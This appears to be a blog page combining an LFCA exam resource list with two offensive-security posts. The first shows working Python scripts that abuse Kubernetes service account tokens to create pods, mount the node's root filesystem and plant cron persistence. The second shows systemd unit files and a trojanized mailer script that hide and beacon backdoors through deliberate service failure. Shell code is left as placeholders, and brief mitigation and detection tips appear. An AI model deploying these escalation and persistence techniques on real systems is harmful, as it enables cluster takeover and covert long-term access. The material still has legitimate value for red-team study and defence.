LFCA Exam, Resources, and Training

Linux Foundation Certified IT Associate (LFCA)

Exam Overview

Since I announced that I was part of the team that helped develop the new Linux Foundation Certified IT Associate (LFCA) exam, I have been bombarded with questions. The majority of these questions I simply will not answer. The Linux Foundation maintains a separation between exam developers and trainers to protect the integrity of the certification.

However, many have asked where to find materials to prepare for the certification, since a specific training course wasn’t released alongside the exam. To those questions, I would point out that the Linux Foundation offers free introductory courses that are linked right on the exam page. These courses cover the vast majority of the listed exam domain subjects.

Nonetheless, the exam itself consists of 60 multiple-choice questions with an exam time of 90 minutes. It is also proctored virtually by PSI, alongside all of the other Linux Foundation exams. To support those taking the exam, I pulled together the exam domain, voucher, and handbook links and provide them below in a single place. I also provided a list of the free courses listed on the LFCA training page. Additionally, I re-ordered the courses based on previous experience with the training materials and how the topics listed in the courses map to the exam domain subjects.

LFCA Exam Domains

The following is the full list of the exam domains and subjects, taken directly from the certification documentation.

  1. Linux Fundamentals – 20%
    1. Linux Operating System
    2. File Management Commands
    3. System Commands
    4. General Networking Commands
  2. System Administration Fundamentals – 20%
    1. System Administration Tasks
    2. Networking
    3. Troubleshooting
  3. Cloud Computing Fundamentals – 20%
    1. Cloud Computing Fundamentals
    2. Performance / Availability
    3. Serverless
    4. Cloud Costs and Budgeting
  4. Security Fundamentals – 16%
    1. Security Basics
    2. Data Security
    3. Network Security
    4. System Security
  5. DevOps Fundamentals – 16%
    1. DevOps Basics
    2. Containers
    3. Deployment Environments
    4. Git Concepts
  6. Supporting Applications and Developers – 8%
    1. Software Project Management
    2. Software Application Architecture
    3. Functional Analysis
    4. Open-source Software and Licensing

Free Training from the Linux Foundation

These core courses offer roughly 120 hours of free material that relates directly to the exam domains.

  • Introduction to Linux – An introduction course to help build up the foundational Linux, system administration, and security knowledge listed in the core exam domains.
  • Basics of Cloud Computing – An introduction course that covers cloud infrastructure and the technologies that drive delivery. This course relates to the Cloud Computing Fundamentals exam domain.
  • DevOps Fundamentals – An introduction course to the principles and practices of development operations (DevOps). This course relates directly to the DevOps fundamentals exam domain.

These additional recommended courses relate to one or more exam domains and provide more detail.

  • Introduction to Kubernetes – A more in-depth dive into Kubernetes as a tool for containerized infrastructure. Highly recommended for those looking to break into the cloud space and/or pursue the CKA exam.
  • Open Source Licensing – Open source software is now everywhere, and the licensing can be very confusing at first. This course offers clear and concise coverage of licensing for those who may not encounter it often.
  • Beginners Guide to Software Development – This course provides a basic introduction to the key concepts of open source software development. It will give those who don’t develop software often just enough to be dangerous.

LFCA Exam and Resources

  • LFCA Exam Voucher – This is the official Linux Foundation Certified IT Associate (LFCA) training page to purchase the exam voucher. This includes a retake if you don’t pass the exam on the first attempt.
  • LFCA Handbook – Exam specific handbooks are provided for all Linux Foundation exams and LFCA is no exception. Reading through the handbook will answer common questions regarding the exam, provide an introduction to the exam environment, and help calm some of the pre-exam nerves.

Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing to take my Certified Kubernetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option automatically mounts the service account token within each container of a given pod. The token is meant to give the pod the ability to interact with the Kubernetes API server. Because this option is enabled by default, it creates a great way for attackers with access to a single container to abuse Kubernetes with the automount service account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specification. This is because the service account dictates permissions and is used to run the pod’s processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pod’s namespace is added automatically. Without a separate service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes, the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure a service account called “default” exists with a valid API bearer token. When a pod is created within the new namespace, the admission controller checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the automountServiceAccountToken option isn’t explicitly set to false within either the pod spec or the service account spec, then the admission controller will also add a volume mount for the service account token to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.
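
Just to illustrate what that automount actually looks like from inside a container, the short Python sketch below (standard library only; the path is the Kubernetes default mentioned above) lists the files that get mounted and reads the bearer token.

import os

# Default path where the admission controller mounts the service account secret
sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"

# The mount normally contains three files: token, ca.crt, and namespace
for name in sorted(os.listdir(sa_dir)):
    print(name)

# The bearer token itself is just a plain text file
token = open(os.path.join(sa_dir, "token")).read()
print("token length:", len(token))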

Why is the AutomountServiceAccountToken bad?

Since permissions are assigned to a service account and all pod processes run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide easier access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling has utilized the service account token to communicate with Kubernetes, so it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script, or even curl commands, we can abuse Kubernetes with the automount service account token.
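
To make the “curl commands” point concrete, here is a rough sketch of talking to the API server with nothing but the bearer token and the Python standard library; it assumes only the standard in-pod environment variables and automount paths, and the client-library version follows in the next section.

import json, os, ssl, urllib.request

sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"
token = open(sa_dir + "/token").read()
namespace = open(sa_dir + "/namespace").read()

# The API server address is injected into every pod as environment variables
host = os.environ["KUBERNETES_SERVICE_HOST"]
port = os.environ["KUBERNETES_SERVICE_PORT"]

# Trust the cluster CA that is automounted alongside the token
ctx = ssl.create_default_context(cafile=sa_dir + "/ca.crt")

# List pods in our own namespace, the same request a curl call would make
req = urllib.request.Request(
    "https://%s:%s/api/v1/namespaces/%s/pods" % (host, port, namespace),
    headers={"Authorization": "Bearer " + token})
for item in json.loads(urllib.request.urlopen(req, context=ctx).read())["items"]:
    print(item["metadata"]["name"])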

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but luckily almost all major programming languages already have Kubernetes client libraries. In my case, I often write in Python, and the Python client library can handle loading a container’s service account token. With that token we can use simple function calls, like those in the following example, to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the container's local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using the Service Account Token to Escalate Privilege with the Node's Root Volume

Since by default there are no pod security policies to restrict the ability to mount a node’s local root filesystem, we can try to leverage the service account token within a compromised container to create a new pod with a volume that mounts the node’s root filesystem, using a similar script.

from kubernetes import client, config
import time

# Load the container's local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
                    'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use a node selector with a label like “kubernetes.io/hostname” to try to get the new pod to spin up on a higher-value control plane node, as sketched below.
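
As a sketch of that idea (the node name shown is just a placeholder for whatever node you are targeting), the pod manifest from the script above could be extended like this before calling create_namespaced_pod. Keep in mind that control plane nodes are usually tainted, so a toleration may also be needed.

# Pin the pod to a specific node via its kubernetes.io/hostname label
pod_manifest['spec']['nodeSelector'] = {
    'kubernetes.io/hostname': 'control-plane-node-1'  # placeholder node name
}

# Control plane nodes are typically tainted, so tolerate everything just in case
pod_manifest['spec']['tolerations'] = [{'operator': 'Exists'}]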

With access to a pod container that has the node’s root filesystem mounted, normal file and credential pillaging can take place. Easier persistence methods can also be used with write access, like adding a crontab or leveraging controlled failure of systemd services (see my recent post), to gain a foothold on the Kubernetes control plane.
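
Purely as a sketch of the crontab idea (the file name and schedule are arbitrary examples, and the <shell code> placeholder is left as-is), a process running inside that pod could drop a cron entry through the mounted root filesystem like so.

# Write a simple cron entry through the node's root filesystem mounted at /host
with open("/host/etc/cron.d/support", "w") as cron_file:
    cron_file.write("*/5 * * * * root python -c '<shell code>'\n")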

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017, this issue is unlikely to be addressed until API v2 is available, because the current behavior is required for backwards compatibility. That being said, the issue can still be addressed manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change into the admission controller, but that would risk compatibility issues and break future upgrades.
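
As one hedged example of the manual fix, the same Python client used above can patch a namespace’s “default” service account; the namespace name here is just an example, and this would need to be repeated (or automated) for every namespace.

from kubernetes import client, config

# Run as a cluster administrator, loading credentials from the local kubeconfig
config.load_kube_config()
v1 = client.CoreV1Api()

# Disable token automounting on the "default" service account of a namespace
v1.patch_namespaced_service_account(
    name="default",
    namespace="example-namespace",  # example namespace; repeat per namespace
    body={"automountServiceAccountToken": False})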

Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red teaming and competitions/events. However, over the years administrators have become more accustomed to systemd and how to work with its units. As a result, these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expected systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, it’s much harder to detect a service with a common name that isn’t actually running when someone looks at a list of running services. It is also possible to hide activities from logging and other monitoring tools. Finally, it’s possible to utilize the StartLimit* options within a systemd unit, like a service, to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method we can simply have the service execute and background a given command, then exit 1/false. The result is a failed start, while the shell code effectively keeps running as a background process. Below is an example of a service very similar to the one from the last systemd blog post.

[Service]
Type=simple
ExecStart=/bin/sh -c "python -c '<shell code>' & exit 1"
Restart=always
RestartSec=300

The benefits are pretty simple: the service won’t show when currently running services are queried. Information about the process and the command run will still be within the service logs, which could lead to quick discovery if the logs and/or service errors are reviewed by an administrator. So overall I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units --failed’ to review what’s going on with the system.

Method B: Expect failure and trigger OnFailure Unit

This method utilizes a legitimate service unit file from a common program that isn’t actually installed. Since the service’s intended binaries and configuration files don’t exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit, similar to this systemd-unit-status-mailer example. The idea is that we can hide our activity within another unit to leverage controlled failure to maintain persistence. An example of this method consists of the following.

First we can modify an existing unit, or copy a new one from a common package, and add the OnFailure option to trigger the secondary unit.

[Unit]
...
OnFailure=unit-status-mail@%n.service

Next we can utilize a legitimate-looking secondary unit, like the common unit status mailer, to just execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally we could add shellcode directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status $UNIT)

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is that the malicious process is nested within the execution of a secondary systemd unit, which only triggers on failure. This means the execution isn’t within the purview of the failing unit itself and therefore will not show up within that unit’s standard logs.

Leveraging Start Limits for effective Beaconing

There are several options available to control how and when systemd will take action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, we can create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5-minute beacon can be built like the following example: with RestartSec=300 the unit restarts every 5 minutes, which works out to 12 starts per 3600-second interval, exactly the StartLimitBurst allowance, so systemd keeps allowing the restarts indefinitely.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=/bin/sh -c "python -c '<shell code>' & exit 1"
Restart=always
RestartSec=300

The option ‘RefuseManualStop=true’ can be used to prevent users from being able to manually stop a given service unit.